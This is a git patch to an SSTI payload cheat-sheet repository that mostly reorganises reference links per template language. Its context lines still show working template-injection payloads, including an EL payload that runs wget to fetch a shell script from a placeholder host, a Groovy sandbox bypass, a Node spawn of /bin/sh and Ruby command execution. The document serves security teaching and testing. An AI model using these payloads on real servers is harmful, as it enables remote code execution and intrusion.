From 21dfd91180bdf2245201d0107a17857355704e23 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 3 Nov 2024 20:54:01 +0100 Subject: [PATCH] SSTI references updates --- Server Side Template Injection/ASP.md | 8 +++++ .../ExpressionLanguage.md | 14 ++++++++- Server Side Template Injection/Java.md | 10 ++++++- Server Side Template Injection/JavaScript.md | 7 +++-- Server Side Template Injection/PHP.md | 6 +++- Server Side Template Injection/Python.md | 5 +++- Server Side Template Injection/README.md | 29 +++---------------- Server Side Template Injection/Ruby.md | 6 +++- mkdocs.yml | 6 ++-- 9 files changed, 56 insertions(+), 35 deletions(-) diff --git a/Server Side Template Injection/ASP.md b/Server Side Template Injection/ASP.md index a9a00fa5..593669a7 100644 --- a/Server Side Template Injection/ASP.md +++ b/Server Side Template Injection/ASP.md @@ -5,13 +5,16 @@ - [ASP.NET Razor](#aspnet-razor) - [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection) - [ASP.NET Razor - Command execution](#aspnet-razor---command-execution) +- [References](#references) ## ASP.NET Razor [Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c) + > Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. + ### ASP.NET Razor - Basic injection ```powershell @@ -25,3 +28,8 @@ // C# code } ``` + + +## References + +- [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - April 15, 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) \ No newline at end of file diff --git a/Server Side Template Injection/ExpressionLanguage.md b/Server Side Template Injection/ExpressionLanguage.md index cd3444c6..12094f2b 100644 --- a/Server Side Template Injection/ExpressionLanguage.md +++ b/Server Side Template Injection/ExpressionLanguage.md @@ -6,6 +6,7 @@ - [Expression Language EL - Basic injection](#expression-language-el---basic-injection) - [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution) - [Expression Language EL - Code Execution](#expression-language-el---code-execution) +- [References](#references) ## Expression Language EL @@ -80,4 +81,15 @@ T(java.lang.Runtime).getRuntime().exec('whoami').x // Method using ScriptEngineManager ${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} -``` \ No newline at end of file +``` + + +## References + +- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE) +- [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) +- [Expression Language Injection - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection) +- [Expression Language injection - PortSwigger - 2024](https://portswigger.net/kb/issues/00100f20_expression-language-injection) +- [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) +- [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html) +- [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) \ No newline at end of file diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 3d979aab..c12e352d 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -27,6 +27,7 @@ - [Groovy - HTTP request:](#groovy---http-request) - [Groovy - Command Execution](#groovy---command-execution) - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass) +- [References](#references) ## Templating Libraries @@ -276,4 +277,11 @@ or ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") } ``` ---- + +## References + +- [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) +- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle @albinowax - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) +- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) +- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle @albinowax - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s) +- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/) \ No newline at end of file diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md index fa3f4aae..a3951d8e 100644 --- a/Server Side Template Injection/JavaScript.md +++ b/Server Side Template Injection/JavaScript.md @@ -8,7 +8,7 @@ - [Lodash](#Lodash) - [Lodash - Basic Injection](#lodash---basic-injection) - [Lodash - Command Execution](#lodash---command-execution) - +- [References](#references) ## Templating Libraries @@ -104,5 +104,8 @@ ${= _.VERSION} {{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}} ``` ---- +## References + +- [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/) +- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) \ No newline at end of file diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 9b0eb730..3732b77b 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -15,6 +15,7 @@ - [patTemplate](#pattemplate) - [PHPlib](#phplib-and-html_template_phplib) - [Plates](#plates) +- [References](#references) ## Templating Libraries @@ -247,4 +248,7 @@ layout template: ``` ---- \ No newline at end of file + +## References + +* [TODO](#todo) \ No newline at end of file diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index c500a018..b57cac98 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -413,4 +413,7 @@ PoC : ## References -* [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) \ No newline at end of file +- [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) +- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) +- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) +- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 90434fa8..eaa48659 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -83,28 +83,7 @@ Once the template engine is identified, the attacker injects more complex expres ## References -* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) -* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) -* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) -* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) -* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/) -* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) -* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) -* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) -* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) -* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) -* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) -* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) -* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) -* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) -* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) -* [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) -* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) -* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) -* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) -* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf) -* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw) -* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) -* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) -* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection) -* [Template Engines Injection 101 - Mahmoud M. Awali - Nov 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) \ No newline at end of file +- [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) +- [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) +- [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) +- [Template Injection On Hardened Targets - Lucas 'BitK' Philippe - September 28, 2022](https://youtu.be/M0b_KA0OMFw) \ No newline at end of file diff --git a/Server Side Template Injection/Ruby.md b/Server Side Template Injection/Ruby.md index 89bb8d32..b6b3339a 100644 --- a/Server Side Template Injection/Ruby.md +++ b/Server Side Template Injection/Ruby.md @@ -8,6 +8,7 @@ - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) - [Ruby - List files and directories](#ruby---list-files-and-directories) - [Ruby - Remote Command execution](#ruby---remote-Command-execution) +- [References](#referenecs) ## Templating Libraries @@ -70,4 +71,7 @@ Execute code using SSTI for **Slim** engine. #{ %x|env| } ``` ---- \ No newline at end of file + +## References + +* [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/) \ No newline at end of file diff --git a/mkdocs.yml b/mkdocs.yml index 0f3dd3ee..1c4cd92b 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -62,9 +62,9 @@ markdown_extensions: - pymdownx.emoji: emoji_index: !!python/name:material.extensions.emoji.twemoji emoji_generator: !!python/name:material.extensions.emoji.to_svg - - mdx_truly_sane_lists: - nested_indent: 2 - # truly_sane: True + # - mdx_truly_sane_lists: + # nested_indent: 2 + # truly_sane: True plugins: - search